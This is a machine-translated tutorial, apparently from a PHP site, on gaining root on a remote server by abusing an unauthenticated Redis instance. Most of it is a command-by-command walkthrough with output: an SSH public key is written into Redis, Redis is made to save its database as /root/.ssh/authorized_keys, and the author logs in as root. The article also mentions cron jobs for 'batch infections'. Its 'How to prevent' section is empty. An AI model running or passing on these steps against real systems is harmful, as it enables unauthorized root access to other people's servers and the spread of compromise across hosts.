This article brings you relevant knowledge about the Redis mining principle. Let’s demonstrate how to use Redis to escalate privileges to obtain the Root user of the remote server, and how to protect it. I hope it will help Everyone is helpful.
Recommended learning: Redis video tutorial
Today we will demonstrate how to obtain the Root user of the remote server through privilege escalation through Redis .
1. First we need some prerequisites
Condition 1: You must first have a Redis, and we must know its port【 Default 6379];
Condition 2: The password for Redis cannot be too complex, or there is no password;
Condition 3: The user who starts Redis must be the most It is better to be a Root user, which is more destructive;
2. Start making trouble
##2.1 Create a pair of secret keys
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsaNext, the attack key value is generated through the public key.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txtThe content is as follows
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kaliThe purpose of adding two newlines before and after here is to prevent the data from being connected together and causing failure problems.
2.2 Configure Key to Redis
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OKLog in to Redis to check , whether it has been written into Redis.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
2.3 Replace system files through the Redis saving mechanism
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exitAt this time, we log in to the remote host to see the effect.
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~#OK, we have successfully escalated our rights here, so let’s take a look at what the exported file is? In fact, it is just the saved file form of Redis. If you are interested, you can open it yourself and have a look. It will not be shown here.
3. How to prevent
This vulnerability is quite powerful. We only have one host permission now, add it to the scheduled task to execute some scripts, and then What about batch infections? Tips for prevention are as follows:The above is the detailed content of Let's talk about the principles of Redis mining (detailed examples). For more information, please follow other related articles on the PHP Chinese website!